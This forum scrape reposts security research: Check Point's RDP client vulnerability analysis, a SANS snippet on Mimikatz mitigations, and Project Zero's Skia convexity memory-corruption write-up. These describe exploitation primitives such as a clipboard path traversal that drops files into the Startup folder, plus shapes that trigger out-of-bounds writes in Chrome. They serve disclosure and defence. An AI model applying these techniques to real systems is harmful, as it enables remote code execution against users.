an Integer-Underflow when calculating “pkglen”, and to an additional Integer-Overflow when allocating “xmalloc(pkglen + 1)” bytes for our buffer, as can be seen in my comment above the call to “xmalloc”. Together with the proprietary implementation of “STRNCPY”, seen in Figure 4, we can trigger a massive heap-based buffer overflow when copying data to the tiny allocated heap buffer. Figure 4: proprietary implementation of the “strncpy” function By chaining together these two vulnerabilities, found in three different logical channels, we now have three remote code execution vulnerabilities. CVE 2018-8795 – Remote Code Execution Another classic vulnerability is an Integer-Overflow when processing the received bitmap (screen content) updates, as can be seen in Figure 5: Figure 5: Integer-Overflow when processing bitmap updates Although “width” and “height” are only 16 bits each, by multiplying them together with “Bpp” (bits-per-pixel), we can trigger an Integer-Overflow. Later on, the bitmap decompression will process our input and break on any decompression error, giving us a controllable heap-based buffer-overflow. Note: This tricky calculation can be found in several places throughout the code of “rdesktop”, so we marked it as a potential vulnerability to check for in “FreeRDP”. FreeRDP Tested version: 2.0.0-rc3 After finding multiple vulnerabilities in “rdesktop”, we approached “FreeRDP” with some trepidation; perhaps only “rdesktop” had vulnerabilities when implementing RDP? We still can’t be sure that every implementation of the protocol will be vulnerable. And indeed, at first glance, the code seemed much better: there are minimal size checks before parsing data from the received packet, and the code “feels” more mature. It is going to be a challenge. However, after a deeper examination, we started to find cracks in the code, and eventually we found critical vulnerabilities in this client as well. We found 5 vulnerabilities with major security impact, and 6 vulnerabilities overall in the library. For the full list of CVEs for “FreeRDP”, see Appendix B. Note: An additional recon showed that the RDP client NeutrinoRDP is a fork of an older version (1.0.1) of “FreeRDP” and therefore probably suffers from the same vulnerabilities. At the end of our research, we developed a PoC exploit for CVE 2018-8786, as can be seen in this video: CVE 2018-8787 – Same Integer-Overflow As we saw earlier in “rdesktop”, calculating the dimensions of a received bitmap update is susceptible to Integer-Overflows. And indeed, “FreeRDP” shares the same vulnerability: Figure 6: Same Integer-Overflow when processing bitmap updates Remote Code Execution – CVE 2018-8786 Figure 7: Integer-Truncation when processing bitmap updates As can be seen in Figure 7, there is an Integer-Truncation when trying to calculate the required capacity for the bitmap updates array. Later on, rectangle structs will be parsed from our packet and into the memory of the too-small allocated buffer. This specific vulnerability is followed by a controlled amount (“bitmapUpdate->number”) of heap allocations (with a controlled size) when the rectangles are parsed and stored to the array, granting the attacker a great heap-shaping primitive. The downside of this vulnerability is that most of the rectangle fields are only 16 bits wide, and are upcasted to 32 bits to be stored in the array. Despite this, we managed to exploit this CVE in our PoC. Even this partially controlled heap-based buffer-overflow is enough for a remote code execution. Mstsc.exe – Microsoft’s RDP client Tested version: Build 18252.rs_prerelease.180928-1410 After we finished checking the open source implementations, we felt that we had a pretty good understanding of the protocol and can now start to reverse engineer Microsoft’s RDP client. But first thing first, we need to find which binaries contain the logic we want to examine. The *.dll files and *.exe files we chose to focus on: rdpbase.dll – Protocol layer for the RDP client. rdpserverbase.dll – Protocol layer for the RDP server. rdpcore.dll / rdpcorets.dll – Core logic for the RDP engine. rdpclip.exe – An .exe we found and that we will introduce later on. mstscax.dll – Mostly the same RDP logic, used by mstsc.exe. Testing prior vulnerabilities We started by testing our PoCs for the vulnerabilities in the open-source clients. Unfortunately, all of them caused the client to close itself cleanly, without any crash. Having no more excuses, we opened IDA and started to track the flow of the messages. Soon enough, we realized that Microsoft’s implementation is much better than the implementations we tested previously. Actually, it seems like Microsoft’s code is better by several orders of magnitude, as it contains: Several optimization layers for efficient network streaming of the received video. Robust input checks. Robust decompression checks, to guarantee that no byte will be written past the destination buffer. Additional supported clipboard features. … Needless to say, there were checks for Integer-Overflows when processing bitmap updates. Wait a minute, they share a clipboard? When we checked “rdesktop” and “FreeRDP”, we found several vulnerabilities in the clipboard sharing channel (every logical data layer is called a channel). However, at the time, we didn’t pay much attention to it because they only shared two formats: raw text and Unicode text. This time it seems that Microsoft supports several more shared data formats, as the switch table we saw was much bigger than before. After reading more about the different formats in MSDN, one format immediately attracted our attention: “CF_HDROP”. This format seems responsible for “Drag & Drop” (hence the name HDROP), and in our case, the “Copy & Paste” feature. It’s possible to simply copy a group of files from the first computer, and paste them in the second computer. For example, a malware researcher might want to copy the output log of his script from the remote VM to his desktop. It was roughly at this point, while I was trying to figure out the flow of the data, Omer (@GullOmer) asked me if and where PathCanonicalizeA is called. If the client fails to properly canonicalize and sanitize the file paths it receives, it could be vulnerable to a path-traversal attack, allowing the server to drop arbitrary files in arbitrary paths on the client’s computer, a very strong attack primitive. After failing to find imports for the canonicalization function, we dug in deeper, trying to figure out the overall architecture for this data flow. Figure 8 summarizes our findings: Figure 8: Architecture of the clipboard sharing in Microsoft’s RDP This is where rdpclip.exe comes into play. It turns out that the server accesses the clipboard through a broker, and that is rdpclip.exe. In fact, rdpclip.exe is just a normal process (we can kill / spawn it ourselves) that talks to the RDP service using a dedicated virtual channel API. At this stage, we installed ClipSpy, and started to dynamically debug the clipboard’s data handling that is done inside rdpclip.exe. These are our conclusions regarding the data flow in an ordinary “Copy & Paste” operation in which a file is copied from the server to the client: On the server, the “copy” operation creates a clipboard data of the format “CF_HDROP”. When the “paste” is performed in the client’s computer, a chain of events is triggered. The rdpclip.exe process on the server is asked for the clipboard’s content, and converts it to a FileGroupDescriptor (Fgd) clipboard format. The metadata of the files is added to the descriptor one at a time, using the HdropToFgdConverter::AddItemToFgd() function. After it is finished, the Fgd blob is sent to the RDP service on the server. The server simply wraps it and sends it to the client. The client unwraps it and stores it in its own clipboard. A “paste” event is sent to the process of the focused window (for example, explorer.exe). This process handles the event and reads the data from the clipboard. The content of the files is received over the RDP connection itself. Path Traversal over the shared RDP clipboard If we look back on the steps performed on the received clipboard data, we notice that the client doesn’t verify the received Fgd blob that came from the RDP server. And indeed, if we modify the server to include a path traversal path of the form: ..\canary1.txt, ClipSpy shows us (see Figure 9) that it was stored “as is” on the client’s clipboard: Figure 9: Fgd with a path-traversal was stored on the client’s clipboard In Figure 10, we can see how explorer.exe treats a path traversal of ..\filename.txt: Figure 10: Fgd with a path-traversal as explorer.exe handles it Just to make sure, after the “paste” in folder “Inner”, the file is stored to “Base” instead: Figure 11: Folders after a successful path traversal attack And that’s practically it. If a client uses the “Copy & Paste” feature over an RDP connection, a malicious RDP server can transparently drop arbitrary files to arbitrary file locations on the client’s computer, limited only by the permissions of the client. For example, we can drop malicious scripts to the client’s “Startup” folder, and after a reboot they will be executed on his computer, giving us full control. Note: In our exploit, we simply killed rdpclip.exe, and spawned our own process to perform the path traversal attack by adding additional malicious file to every “Copy & Paste” operation. The attack was performed with “user” permissions, and does not require the attacker to have “system” or any other elevated permission. Here is a video of our PoC exploit: Taking it one step further Every time a clipboard is updated on either side of the RDP connection, a CLIPRDR_FORMAT_LIST message is sent to the other side, to notify it about the new clipboard formats that are now available. We can think of it as a complete sync between the clipboards of both parties (except for a small set of formats that are treated differently by the RDP connection itself). This means that our malicious server is notified whenever the client copies something to his “local” clipboard, and it can now query the values and read them. In addition, the server can notify the client about a clipboard “update” without the need for a “copy” operation inside the RDP window, thus completely controlling the client’s clipboard without being noticed. Scenario #1: A malicious RDP server can eavesdrop on the client’s clipboard – this is a feature, not a bug. For example, the client locally copies an admin password, and now the server has it too. Scenario #2: A malicious RDP server can modify any clipboard content used by the client, even if the client does not issue a “copy” operation inside the RDP window. If you click “paste” when an RDP connection is open, you are vulnerable to this kind of attack. For example, if you copy a file on your computer, the server can modify your (executable?) file / piggy-back your copy to add additional files / path-traversal files using the previously shown PoC. We were able to successfully test this attack scenario using NCC’s .NET deserialization PoC: The server executes their PoC, and positions in the clipboard a .NET content that will pop a calculator (using the “System.String” format). When the client clicks “paste” inside the PowerShell program, the deserialization occurs and a calc is popped. Note: The content of the synced clipboard is subject to Delayed Rendering. This means that the clipboard’s content is sent over the RDP connection only after a program actively asks for it, usually by clicking “paste”. Until then, the clipboard only holds the list of formats that are available, without holding the content itself. Disclosure Timeline 16 October 2018 – Vulnerability was disclosed to Microsoft. 22 October 2018 – Vulnerabilities were disclosed to FreeRDP. 22 October 2018 – FreeRDP replied and started working on a patch. 28 October 2018 – Vulnerabilities were disclosed to rdesktop. 5 November 2018 – FreeRDP sent us the patches and asked for us to verify them. 18 November 2018 – We verified the patches of FreeRDP, and gave them a “green light” to continue. 20 November 2018 – FreeRDP committed the patches to their Github as part of 2.0.0-rc4. 17 December 2018 – Microsoft acknowledged our findings. For more information, see Microsoft’s Response. 19 December 2018 – rdesktop sent us the patches and asked us to verify them. 19 December 2018 – We verified the patches of rdesktop, and gave them a “green light” to continue. 16 January 2019 – rdesktop committed the patches to their Github as part of v1.8.4. Microsoft’s Response During the responsible disclosure process, we sent the details of the path traversal in mstsc.exe to Microsoft. This is Microsoft’s official response: “Thank you for your submission. We determined your finding is valid but does not meet our bar for servicing. For more information, please see the Microsoft Security Servicing Criteria for Windows (https://aka.ms/windowscriteria).” As a result, this path traversal has no CVE-ID, and there is no patch to address it. Conclusion During our research, we found numerous critical vulnerabilities in the tested RDP clients. Although the code quality of the different clients varies, as can be seen by the distribution of the vulnerabilities we found, we argue that the remote desktop protocol is complicated, and is prone to vulnerabilities. As we demonstrated in our PoCs for both Microsoft’s client and one of the open-sourced clients, a malicious RDP server can leverage the vulnerabilities in the RDP clients to achieve remote code execution over the client’s computer. As RDP is regularly used by IT staff and technical workers to connect to remote computers, we highly recommend that everyone patch their RDP clients. In addition, due to the nature of the clipboard findings we showed in Microsoft’s RDP client, we recommend users to disable the clipboard sharing channel (on by default) when connecting to a remote machine. Recommendation for Protection Check Point recommends the following steps in order to protect against this attack: Check Point Research worked closely with FreeRDP, rdesktop and Microsoft to mitigate these vulnerabilities. If you are using rdesktop or FreeRDP, update to the latest version which includes the relevant patches. When using Microsoft RDP client (MSTSC), we strongly recommend disabling bi-directional clipboard sharing over RDP. Apply security measures to both the clients and the servers involved in the RDP communication. Check Point provides various security layers that may be used for protection such as IPS, SandBlast Agent, Threat Emulation and ANTEX. Users should avoid using RDP to connect to remote servers that have not implemented sufficient security measures. Check Point’s IPS blade provides protections against these threats: “FreeRDP Remote Code Execution (CVE-2018-8786)” Appendix A – CVEs found in rdesktop: CVE 2018-8791: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function rdpdr_process() that results in an information leak. CVE 2018-8792: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function cssp_read_tsrequest() that results in a Denial of Service (segfault). CVE 2018-8793: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function cssp_read_tsrequest() that results in a memory corruption and probably even a remote code execution. CVE 2018-8794: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to an Out-Of-Bounds Write in function process_bitmap_updates() and results in a memory corruption and possibly even a remote code execution. CVE 2018-8795: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in function process_bitmap_updates() and results in a memory corruption and probably even a remote code execution. CVE 2018-8796: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_bitmap_updates() that results in a Denial of Service (segfault). CVE 2018-8797: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function process_plane() that results in a memory corruption and probably even a remote code execution. CVE 2018-8798: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function rdpsnd_process_ping() that results in an information leak. CVE 2018-8799: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_secondary_order() that results in a Denial of Service (segfault). CVE 2018-8800: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function ui_clip_handle_data() that results in a memory corruption and probably even a remote code execution. CVE 2018-20174: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function ui_clip_handle_data() that results in an information leak. CVE 2018-20175: rdesktop versions up to and including v1.8.3 contains several Integer Signedness errors that leads to Out-Of-Bounds Reads in file mcs.c and result in a Denial of Service (segfault). CVE 2018-20176: rdesktop versions up to and including v1.8.3 contains several Out-Of-Bounds Reads in file secure.c that result in a Denial of Service (segfault). CVE 2018-20177: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in function rdp_in_unistr() and results in a memory corruption and possibly even a remote code execution. CVE 2018-20178: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_demand_active() that results in a Denial of Service (segfault). CVE 2018-20179: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function lspci_process() and results in a memory corruption and probably even a remote code execution. CVE 2018-20180: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function rdpsnddbg_process() and results in a memory corruption and probably even a remote code execution. CVE 2018-20181: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function seamless_process() and results in a memory corruption and probably even a remote code execution. CVE 2018-20182: rdesktop versions up to and including v1.8.3 contain a Buffer Overflow over the global variables in function seamless_process_line() that results in a memory corruption and probably even a remote code execution. Appendix B – CVEs found in FreeRDP: CVE 2018-8784: FreeRDP prior to version 2.0.0-rc4 contains a Heap-Based Buffer Overflow in function zgfx_decompress_segment() that results in a memory corruption and probably even a remote code execution. CVE 2018-8785: FreeRDP prior to version 2.0.0-rc4 contains a Heap-Based Buffer Overflow in function zgfx_decompress() that results in a memory corruption and probably even a remote code execution. CVE 2018-8786: FreeRDP prior to version 2.0.0-rc4 contains an Integer Truncation that leads to a Heap-Based Buffer Overflow in function update_read_bitmap_update() and results in a memory corruption and probably even a remote code execution. CVE 2018-8787: FreeRDP prior to version 2.0.0-rc4 contains an Integer Overflow that leads to a Heap-Based Buffer Overflow in function gdi_Bitmap_Decompress() and results in a memory corruption and probably even a remote code execution. CVE 2018-8788: FreeRDP prior to version 2.0.0-rc4 contains an Out-Of-Bounds Write of up to 4 bytes in function nsc_rle_decode() that results in a memory corruption and possibly even a remote code execution. CVE 2018-8789: FreeRDP prior to version 2.0.0-rc4 contains several Out-Of-Bounds Reads in the NTLM Authentication module that results in a Denial of Service (segfault). Sursa: https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/
      • 3
      • Thanks
      • Upvote
  24. Mitigations against Mimikatz Style Attacks Published: 2019-02-05 Last Updated: 2019-02-05 15:26:32 UTC by Rob VandenBrink (Version: 1) If you are like me, at some point in most penetration tests you'll have a session on a Windows host, and you'll have an opportunity to dump Windows credentials from that host, usually using Mimikatz. Mimikatz parses credentials (either clear-text or hashes) out of the LSASS process, or at least that's where it started - since it's original version back in the day, it has expanded to cover several different attack vectors. An attacker can then use these credentials to "pivot" to attack other resources in the network - this is commonly called "lateral movement", though in many cases you're actually walking "up the tree" to ever-more-valuable targets in the infrastructure. The defender / blue-teamer (or the blue-team's manager) will often say "this sounds like malware, isnt't that what Antivirus is?". Sadly, this is half right - malware does use this style of attack. The Emotet strain of malware for instance does exactly this, once it gains credentials and persistence it often passes control to other malware (such as TrickBot or Ryuk). Also sadly, it's been pretty easy to bypass AV on this for some time now - there are a number of well-known bypasses that penetration testers use for the Mimikatz + AV combo, many of them outlined on the BHIS blog: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz But what about standard Windows mitigations against Mimikatz? Let's start from the beginnning, when Mimikatz first came out, Microsoft patched against that first version of code using KBKB2871997 (for Windows 7 era hosts, way back in 2014). Articol complet: https://isc.sans.edu/diary/rss/24612
      • 2
      • Thanks
      • Upvote
  25. Tuesday, February 5, 2019 The Curious Case of Convexity Confusion Posted by Ivan Fratric, Google Project Zero Intro Some time ago, I noticed a tweet about an externally reported vulnerability in Skia graphics library (used by Chrome, Firefox and Android, among others). The vulnerability caught my attention for several reasons: Firstly, I looked at Skia before within the context of finding precision issues, and any bugs in the code I already looked at instantly evoke the “What did I miss?” question in my head. Secondly, the bug was described as a stack-based buffer overflow, and you don’t see many bugs of this type anymore, especially in web browsers. And finally, while the bug itself was found by fuzzing and didn’t contain much in the sense of root cause analysis, a part of the fix involved changing the floating point precision from single to double which is something I argued against in the previous blog post on precision issues in graphics libraries. So I wondered what the root cause was and if the patch really addressed it, or if other variants could be found. As it turned out, there were indeed other variants, resulting in stack and heap out-of-bounds writes in the Chrome renderer. Geometry for exploit writers To understand what the issue was, let’s quickly cover some geometry basics we’ll need later. This is all pretty basic stuff, so if you already know some geometry, feel free to skip this section. A convex polygon is a polygon with a following property: you can take any two points inside the polygon, and if you connect them, the resulting line will be entirely contained within the polygon. A concave polygon is a polygon that is not convex. This is illustrated in the following images: Image 1: An example of a convex polygon Image 2: An example of a concave polygon A polygon is monotone with respect to the Y axis (also called y-monotone) if every horizontal line intersects it at most twice. Another way to describe a y-monotone polygon is: if we traverse the points of the polygon from its topmost to its bottom-most point (or the other way around), the y coordinates of the points we encounter are always going to decrease (or always increase) but never alternate directions. This is illustrated by the following examples: Image 3: An example of a y-monotone polygon Image 4: An example of a non-y-monotone polygon A polygon can also be x-monotone if every vertical line intersects it at most twice. A convex polygon is both x- and y-monotone, but the inverse is not true: A monotone polygon can be concave, as illustrated in Image 3. All of the concepts above can easily be extended to other curves, not just polygons (which are made entirely from line segments). A polygon can be transformed by transforming all of its points. A so-called affine transformation is a combination of scaling, skew and translation (note that affine transformation also includes rotation because rotation can be expressed as a combination of scale and skew). Affine transformation has a property that, when it is used to transform a convex shape, the resulting shape must also be convex. For the readers with a basic knowledge of linear algebra: a transformation can be represented in the form of a matrix, and the transformed coordinates can be computed by multiplying the matrix with a vector representing the original coordinates. Transformations can be combined by multiplying matrices. For example, if you multiply a rotation matrix and a translation matrix, you’ll get a transformation matrix that includes both rotation and translation. Depending on the multiplication order, either rotation or translation is going to be applied first. The bug Back to the bug: after analyzing it, I found out that it was triggered by a malformed RRect (a rectangle with curved corners where the user can specify a radius for each corner). In this case, tiny values were used as RRect parameters which caused precision issues when the RRect was converted into a path object (a more general shape representation in Skia which can consist of both line and curve segments). The result of this was, after the RRect was converted to a path and transformed, the resulting shape didn’t look like a RRect at all - the resulting shape was concave. At the same time Skia assumes that every RRect must be convex and so, when the RRect is converted to a path, it sets the convexity attribute on the path to kConvex_Convexity (for RRects this happens in a helper class SkAutoPathBoundsUpdate). Why is this a problem? Because Skia has different drawing algorithms, some of which only work for convex paths. And, unfortunately, using algorithms for drawing convex paths when the path is concave can result in memory corruption. This is exactly what happened here. Skia developers fixed the bug by addressing RRect-specific computations: they increased the precision of some calculations performed when converting RRects to paths and also made sure that any RRect corner with a tiny radius would be treated as if the radius is 0. Possibly (I haven’t checked), this makes sure that converting RRect to a path won’t result in a concave shape. However, another detail caught my attention: Initially, when the RRect was converted into a path, it might have been concave, but the concavities were so tiny that they wouldn’t cause any issues when the path was rendered. At some point the path was transformed which caused the concavities to become more pronounced (the path was very clearly concave at this point). And yet, the path was still treated as convex. How could that be? The answer: The transformation used was an affine transform, and Skia respects the mathematical property that transforming a shape with an affine transform can not change its convexity, and so, when using an affine transform to transform a path, it copies the convexity attribute to the resulting path object. This means: if we can convince Skia that a path is convex, when in reality it is not, and if we apply any affine transform to the path, the resulting path will also be treated as convex. The affine transform can be crafted so that it enlarges, rotates and positions concavities so that, once the convex drawing algorithm is used on the path, memory corruption issues are triggered. Additionally (untested) it might be possible that, due to precision errors, computing a transformation itself might introduce tiny concavities when there were none previously. These concavities might then be enlarged in subsequent path transformations. Unfortunately for computational geometry coders everywhere, accurately determining whether a path is convex or not in floating point precision (regardless if single or double floating point precision is used) is very difficult / almost impossible to do. So, how does Skia do it? Convexity computations in Skia happen in the Convexicator class, where Skia uses several criteria to determine if a path is convex: It traverses a path and computes changes of direction. For example, if we follow a path and always turn left (or always turn right), the path must be convex. It checks if a path is both x- and y-monotone When analyzing this Convexicator class, I noticed two cases where a concave paths might pass as convex: As can be seen here, any pair of points for which the squared distance does not fit in a 32-bit float (i.e. distance between the points smaller than ~3.74e-23) will be completely ignored. This, of course, includes sequences of points which form concavities. Due to tolerances when computing direction changes (e.g here and here) even concavities significantly larger than 3.74e-23 can easily passing the convexity check (I experimented with values around 1e-10). However, such concavities must also pass the x- and y-monotonicity check. Note that, in both cases, a path needs to have some larger edges (for which direction can be properly computed) in order to be declared convex, so just having a tiny path is not sufficient. Fortunately, a line is considered convex by Skia, so it is sufficient to have a tiny concave shape and a single point at a sufficient distance away from it for a path to be declared convex. Alternately, by combining both issues above, one can have tiny concavities along the line, which is a technique I used to create paths that are both small and clearly concave when transformed (Note: the size of the path is often a factor when determining which algorithms can handle which paths). To make things clearer, let’s see an example of bypassing the convexity check with a polygon that is both x- and y- monotone. Consider the polygon in Image 5 (a) and imagine that the part inside the red circle is much smaller than depicted. Note that this polygon is concave, but it is also both x-monotone and y-monotone. Thus, if the concavity depicted in the red circle is sufficiently small, the polygon is going to be declared convex. Now, let’s see what we can do with it by applying an affine transform - firstly, we can rotate it and make it non-y-monotone as depicted in Image 5 (b). Having a polygon that is not y-monotone will be very important for triggering memory corruption issues later. Secondly, we can scale (enlarge) and translate the concavity to fill the whole drawing area, and when the concavity is intersected with the drawing area we’ll end up with something like depicted in Image 5 (c), in which the polygon is clearly concave and the concavity is no longer small. (a) (b) (c) Image 5: Bypassing the convexity check with a monotone polygon The walk_convex_edges algorithm Now that we can bypass the convexity check in various ways, let’s see how it can lead to problems. To understand this, let’s first examine how Skia's algorithm for drawing (filling) convex paths works (code here). Let’s consider an example in Image 6 (a). The first thing Skia does is, it extracts polygon (path) lines (edges) and sorts them according to the coordinates of the topmost point. The sorting order is top-to-bottom, and if two points have the same y coordinate, then the one with a smaller x coordinate goes first. This has been done for the polygon in Image 6 (a) and the numbers next to the edges depict their order. The bottommost edge is ignored because it is fully horizontal and thus not needed (you’ll see why in a moment). Next, the edges are traversed and the area between them drawn. First, the first two edges (edges 1 and 2) are taken and the area between them is filled from top to bottom - this is the red area in Image 6 (b). After this, edge 1 is “done” and it is replaced by the next edge - edge 3. Now, area between edge 2 and edge 3 is filled (orange area). Next, edge 2 is “done” and is replaced by the next in line: edge 4. Finally, the area between edges 3 and 4 is rendered. Since there are no more edges, the algorithm stops. (a) (b) Image 6: Skia convex path filling algorithm Note that, in the implementation, the code for rendering areas where both edges are vertical (here) is different than the code for rendering areas where at least one edge is at an angle (here). In the first case, the whole area is rendered in a single call to blitter->blitRect() while in the second case, the area is rendered line-by-line and for each line blitter->blitH() is called. Of special interest here is the local_top variable, essentially keeping track of the next y coordinate to fill. In the case of drawing non-vertical edges, this is simply incremented for every line drawn. In case of vertical lines (drawing a rectangle), after the rectangle is drawn, local_top is set based on the coordinates of the current edge pair. This difference in behavior is going to be useful later. One interesting observation about this algorithm is that it would not only work correctly for convex paths - it would work correctly for all paths that are y-monotone. Using it for y-monotone paths would also have another benefit: Checking if a path is y-monotone could be performed faster and more accurately than checking if a path is convex. Variant 1 Now, let’s see how drawing concave paths using this algorithm can lead to problems. As the first example, consider the polygon in Image 7 (a) with the edge ordering marked. (a) (b) Image 7: An example of a concave path that causes problem in Skia if rendered as convex Image 7 (b) shows how the shape is rendered. First, a large red area between edges 1 and 2 is rendered. At this point, both edges 1 and 2 are done, and the orange rectangular area between areas 3 and 4 is rendered next. The purpose of this rectangular area is simply to reset the local_top variable to its correct value (here), otherwise local_top would just continue increasing for every line drawn. Next, the green area between edges 3 and 5 is drawn - and this causes problems. Why? Because Skia expects to always draw pixels in a top-to-bottom, left-to right order, e.g. point (x, y) = (1, 1) is always going to be drawn before (1, 2) and (1, 1) is also going to be always drawn before (2, 1). However, in the example above, the area between edges 1 and 2 will have (partially) the same y values as the area between edges 3 and 5. The second area is going to be drawn, well, second, and yet it contains a subset of same y coordinates and lower x coordinates than the first region. Now let’s see how this leads to memory corruption. In the original bug, a concave (but presumed convex) path was used as a clipping region (every subsequent draw call draws only inside the clipping region). When setting a path as a clipping region, it also gets “drawn”, but instead of drawing pixels on the screen, they just get saved so they could be intersected with what gets drawn afterwards. The pixels are saved in SkRgnBuilder::blitH and actually, individual pixels aren't saved but instead the entire range of pixels (from x to x + width at height y) gets stored at once to save space. These ranges - you guessed it - also depend on the correct drawing order as can be seen here (among other places). Now let’s see what happens when a second path is drawn inside a clipping region with incorrect ordering. If antialiasing is turned on when drawing the second path, SkRgnClipBlitter::blitAntiH gets called for every range drawn. This function needs to intersect the clip region ranges with the range being drawn and only output the pixels that are present in both. For that purpose, it gets the clipping ranges that intersect the line being drawn one by one and processes them. SkRegion::Spanerator::next is used to return the next clipping range. Let’s assume the clipping region for the y coordinate currently drawn has the ranges [start x, end x] = [10, 20] and [0, 2] and the line being drawn is [15,16]. Let’s also consider the following snippet of code from SkRegion::Spanerator::next: if (runs[0] >= fRight) { fDone = true; return false; } SkASSERT(runs[1] > fLeft); if (left) { *left = SkMax32(fLeft, runs[0]); } if (right) { *right = SkMin32(fRight, runs[1]); } fRuns = runs + 2; return true; where left and right are the output pointers, fLeft and fRight are going to be left and right x value of the line being drawn (15 and 16 respectively), while runs is a pointer to clipping region ranges that gets incremented for every iteration. For the first clipping line [10, 20] this is going to work correctly, but let’s see what happens for the range [0, 2]. Firstly, the part if (runs[0] >= fRight) { fDone = true; return false; } is supposed to stop the algorithm, but due to incorrect ordering, it does not work (16 >= 0 is false). Next, left is computed as Max(15, 0) = 15 and right as Min(16, 2) = 2. Note how left is larger than right. This is going to result in calling SkAlphaRuns::Break with a negative count argument on the line, SkAlphaRuns::Break((int16_t*)runs, (uint8_t*)aa, left - x, right - left); which then leads to out-of-bounds write on the following lines in SkAlphaRuns::Break: x = count; ... alpha[x] = alpha[0]; Why did this result in out-of-bounds write on the stack? Because, in the case of drawing only two pixels, the range arrays passed to SkRgnClipBlitter::blitAntiH and subsequently SkAlphaRuns::Break are allocated on stack in SkBlitter::blitAntiH2 here. Triggering the issue in a browser This is great - we have a stack out-of-bounds write in Skia, but can we trigger this in Chrome? In general, in order to trigger the bug, the following conditions must be met: We control a path (SkPath) object Something must be done to the path object that computes its convexity The same path must be transformed and filled / set as a clip region My initial idea was to use a CanvasRenderingContext2D API and render a path twice: once without any transform just to establish its convexity and a second time with a transformation applied to the CanvasRenderingContext2D object. Unfortunately, this approach won’t work - when drawing a path, Skia is going to copy it before applying a transformation, even if there is effectively no transformation set (the transformation matrix is an identity matrix). So the convexity property is going to be set on a copy of the path and not the one we get to keep the reference to. Additionally, Chrome itself makes a copy of the path object when calling any canvas functions that cause a path to be drawn, and all the other functions we can call with a path object as an argument do not check its convexity. However, I noticed Chrome canvas still draws my convex/concave paths incorrectly - even if I just draw them once. So what is going on? As it turns out, when drawing a path using Chrome canvas, the path won’t be drawn immediately. Instead, Chrome just records the draw path operation using RecordPaintCanvas and all such draw operations will be executed together, at a later time. When a DrawPathOp object (representing a path drawing operation) is created, among other things, it is going to check if the path is “slow”, and one of the criteria for this is path convexity: int DrawPathOp::CountSlowPaths() const { if (!flags.isAntiAlias() || path.isConvex()) return 0; … } All of this happens before the path is transformed, so we seemingly have a perfect scenario: We control a path, its convexity is checked, and the same path object later gets transformed and rendered. The second problem with canvas is that, in the previously described approach to converting the issue to memory corruption, we relied on SkRgnBuilder, which is only used when a clip region has antialiasing turned off, while everything in Chrome canvas is going to be drawn with antialiasing on. Chrome also implements the OffscreenCanvas API which sets clip antialiasing to off (I’m not sure if this is deliberate or a bug), but OffscreenCanvas does not use RecordPaintCanvas and instead draws everything immediately. So the best way forward seemed to be to find some other variants of turning convexity issues into memory corruption, ones that would work with antialiasing on for all operations. Variant 2 As it happens, Skia implements three different algorithms for path drawing with antialiasing on and one of these (SkScan::SAAFillPath, using supersampled antialiasing) uses essentially the same filling algorithm we analyzed before. Unfortunately, this does not mean we can get to the same buffer overflow as before - as mentioned before SkRgnBuilder / SkRgnClipBlitter are not used with antialiasing on. However, we have other options. If we simply fill the path (no clip region needed this time) with the correct algorithm, SuperBlitter::blitH is going to be called without respecting the top-to-bottom, left-to-right drawing order. SuperBlitter::blitH calls SkAlphaRuns::add and as the last argument, it passes the rightmost x coordinate we have drawn so far. This is subtracted from the currently drawn x coordinate on the line: x -= offsetX; And if x is smaller than something we drew already (for the same y coordinate) it becomes negative. This is of course exactly what happens when drawing pixels out of Skia expected order. The result of this is calling SkAlphaRuns::Break with a negative “x” argument. This skips the entire first part of the function (the “while (x > 0)” loop), and continues to the second part: runs = next_runs; alpha = next_alpha; x = count; for (;;) { int n = runs[0]; SkASSERT(n > 0); if (x < n) { alpha[x] = alpha[0]; runs[0] = SkToS16(x); runs[x] = SkToS16(n - x); break; } x -= n; if (x <= 0) { break; } runs += n; alpha += n; } Here, x gets overwritten with count, but the problem is that runs[0] is not going to be initialized (the first part of the function is supposed to initialize it), so in int n = runs[0]; an uninitialized variable gets read into n and is used as an offset into arrays, which can result in both out-of-bounds read and out-of-bounds write when the following lines are executed: runs += n; alpha += n; alpha[x] = alpha[0]; runs[0] = SkToS16(x); runs[x] = SkToS16(n - x); The shape needed to trigger this is depicted in image 8 (a). (a) (b) Image 8: Shape used to trigger variant 2 in Chrome This shape is similar to the one previously depicted, but there are some differences, namely: We must render two ranges for the same y coordinate immediately one after another, where the second range is going to be to the left of the first range. This is accomplished by making the rectangular area between edges 3 and 4 (orange in Image 8 (b)) less than a pixel wide (so it does not in fact output anything) and making the green area between edges 5 and 6 (green in the image) only a single pixel high. The second range for the same y must not start at x = 0. This is accomplished by edge 5 ending a bit away from the left side of the image bounds. This variant can be triggered in Chrome by simply drawing a path - the poc can be seen here. Variant 3 Uninitialized variable bug in a browser is nice, but not as nice as a stack out-of-bounds write, so I looked for more variants. For the next and final one, the path we need is a bit more complicated and can be seen in Image 9 (a) (note that the path is self-intersecting). (a) (b) Image 9: A shape used to trigger a stack buffer overflow in Chrome Let’s see what happens in this one (assume the same drawing algorithm is used as before): First, edges 1, 2, 3 and 4 are handled. This part is drawn incorrectly (only red and orange areas in Image 9 (b) are filled), but the details 